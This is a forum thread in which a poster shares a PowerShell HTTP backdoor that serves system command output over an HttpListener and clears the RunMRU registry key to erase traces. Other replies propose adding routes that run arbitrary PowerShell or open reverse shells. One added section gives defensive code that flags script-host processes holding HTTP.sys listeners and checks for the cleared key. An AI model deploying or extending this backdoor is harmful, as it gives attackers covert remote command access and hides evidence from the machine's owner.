powershell infiltration


jOte-

Posted

############## powershell http backdoor...

$cHOST= 'localhost'; # '0.0.0.0' needs admin
$cPORT= 8080;

$URL = "http://$($cHOST):$($cPORT)/";

$ROUTES = @{
  "GET /exit" = { EXIT };
  "GET /isadmin" = { return "$(& net session 2>&1 | Out-String)" }; 
  "GET /ipconfig" = { return "$(& ipconfig 2>&1 | Out-String)" };
  "GET /ipconfigall" = { return "$(& ipconfig /all 2>&1 | Out-String)" };
  "GET /trol/flipscreen" = { return "flipscreen" };
  "GET /trol/switchmousebuttons" = { return "switchmousebuttons" }
}

$LISTENER = New-Object System.Net.HttpListener;
$LISTENER.Prefixes.Add($URL);
$LISTENER.Start();

While ($LISTENER.IsListening) {
  If ($START -eq $null) {
    Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
    $START=1
  }
  $CONTEXT = $LISTENER.GetContext();
  $REQUEST = $CONTEXT.Request;
  $RESPONSE = $CONTEXT.Response;

  $RECEIVED = '{0} {1}' -f $REQUEST.httpMethod, $REQUEST.Url.LocalPath;
  
  $ROUTE = $ROUTES.Get_Item($RECEIVED);
  
  If ($ROUTE -eq $null) {
    $RESPONSE.StatusCode = 404;
  } Else {
    $CONTENT = & $($ROUTE);
    $CONTENT = "<pre>$($CONTENT)</pre>";
    $BUFFER = [System.Text.Encoding]::UTF8.GetBytes($CONTENT);
    $RESPONSE.ContentLength64 = $BUFFER.Length;
    $RESPONSE.OutputStream.Write($BUFFER, 0, $BUFFER.Length);
  }
  $RESPONSE.Close();
}

Posted
3 hours ago, jOte- said:

############## powershell http backdoor...

Looks interesting.

2 hours ago, jOte- said:

this is just a proof of concept... im not intending to send full scripts....

Okay.

1 hour ago, jOte- said:

some ppl will understand.... 

Yes.

1 hour ago, jOte- said:

BTW... who is that "thehappydinoanoob"??? Killing my entries with his stupid questions...

No idea.

Posted

Hmm, a dirty web server as a malicious service.  I've been experimenting with using HttpListener in PowerShell as a PSJob to get payload jobs from.  Never thought about using it the way you use it because normally binding to a port in Windows requires admin.  Do not know if that applies only to ports < 1024.

To improve code I would check for admin and you could add a url that accepts Powershell script as a string to invoke. :-)
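For anyone on the defending side of this thread, here is an added example (my own, not code from jOte- or PoSHMagiC0de) of how to spot the pattern above on a host. The point that matters for detection: HttpListener hands its prefix to HTTP.sys, so the TCP socket is owned by the System process (PID 4) and a plain listening-port check will not point at powershell.exe. HTTP.sys does record which user-mode process is attached to each request queue, and `netsh http show servicestate view=requestq` exposes that. The script assumes Windows 8 / Server 2012 or later, that it is run from an elevated prompt, and that the text layout of the two netsh views (the `Process IDs:` and `Registered URLs:` sections, and the `Reserved URL` / `User:` lines) is as described in the comments; that layout is an assumption on my part.

```powershell
# Added example, not from the thread: audit HTTP.sys request queues and URL reservations
# so a script-host process that registered an HttpListener prefix becomes visible.

function Get-HttpSysRequestQueue {
    # Parses "netsh http show servicestate view=requestq". In that output each queue lists
    # its attached PIDs under "Process IDs:" before its URL groups list "Registered URLs:",
    # so every "Process IDs:" header starts a new record and the URLs that follow belong to it.
    $lines   = netsh http show servicestate view=requestq 2>&1
    $records = New-Object System.Collections.Generic.List[object]
    $current = $null
    $mode    = $null
    foreach ($line in $lines) {
        $t = "$line".Trim()
        if ($t -eq 'Process IDs:') {
            $current = [pscustomobject]@{ ProcessIds = @(); Urls = @() }
            $records.Add($current)
            $mode = 'pid'
            continue
        }
        if ($t -eq 'Registered URLs:') { $mode = 'url'; continue }
        if ($null -eq $current -or $null -eq $mode) { continue }
        if ($mode -eq 'pid' -and $t -match '^\d+$')      { $current.ProcessIds += [int]$t; continue }
        if ($mode -eq 'url' -and $t -match '^https?://') { $current.Urls += $t; continue }
        $mode = $null   # any other line ends the list we were collecting
    }
    $records
}

function Find-ScriptHostListener {
    # Joins each request queue to its owning process and flags script hosts, which have
    # no business serving HTTP on a workstation.
    param(
        [string[]]$WatchProcess = @('powershell', 'pwsh', 'powershell_ise', 'wscript', 'cscript', 'mshta')
    )
    foreach ($rec in Get-HttpSysRequestQueue) {
        foreach ($procId in $rec.ProcessIds) {
            $proc = Get-Process -Id $procId -ErrorAction SilentlyContinue
            if (-not $proc) { continue }
            $wmi = Get-CimInstance Win32_Process -Filter "ProcessId = $procId" -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Suspicious  = ($WatchProcess -contains $proc.ProcessName)
                ProcessName = $proc.ProcessName
                PID         = $procId
                Urls        = ($rec.Urls -join ', ')
                CommandLine = $wmi.CommandLine
            }
        }
    }
}

function Get-UrlReservation {
    # Parses "netsh http show urlacl". A reservation granted to a broad principal such as
    # \Everyone is what would let a non-admin script bind a prefix on all interfaces,
    # which is the "needs admin" question raised in the thread.
    $out = netsh http show urlacl 2>&1
    $res = @()
    $cur = $null
    foreach ($line in $out) {
        $t = "$line".Trim()
        if ($t -like 'Reserved URL*:*') {
            $cur = [pscustomobject]@{ Url = ($t -split ':\s*', 2)[1]; Users = @() }
            $res += $cur
        }
        elseif ($cur -and $t -like 'User:*') {
            $cur.Users += ($t -split ':\s*', 2)[1]
        }
    }
    $res
}

# Usage: anything flagged Suspicious, or any reservation open to \Everyone, deserves a look.
Find-ScriptHostListener | Format-Table -AutoSize
Get-UrlReservation | Where-Object { $_.Users -contains '\Everyone' } | Format-Table -AutoSize
```

The same `Find-ScriptHostListener` output would also show a listener that bound only to `localhost`, as the posted script does, because HTTP.sys tracks the attached process regardless of the prefix host. Pair it with a check of the RunMRU key's contents being unexpectedly empty, since the script clears that key on its first pass through the loop.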


Posted
9 hours ago, PoSHMagiC0de said:

To improve code I would check for admin and you could add a url that accepts Powershell script as a string to invoke. :-)

On 3/27/2018 at 6:11 AM, jOte- said:

"GET /isadmin" = { return "$(& net session 2>&1 | Out-String)" }; 

He has a URL to check for admin or not, however since I don't have the rest of his code I can't tell what else it's doing there.

I knew you would bring up psh. :P
If cmd, why not psh?

Having some other commands like..

GET /ispsh
GET /reversepsh
GET /sendpsh

even with a CLI tool on it would be interesting.

Posted

Of course, if it is psh, I may come a callin.  :-)


Actually what I meant for the admin check was when running the backdoor it checks if it is being run with enough permission to open the port.


That admin check he is using net session for could be done in PowerShell for more accurate results.

Archived

This topic is now archived and is closed to further replies.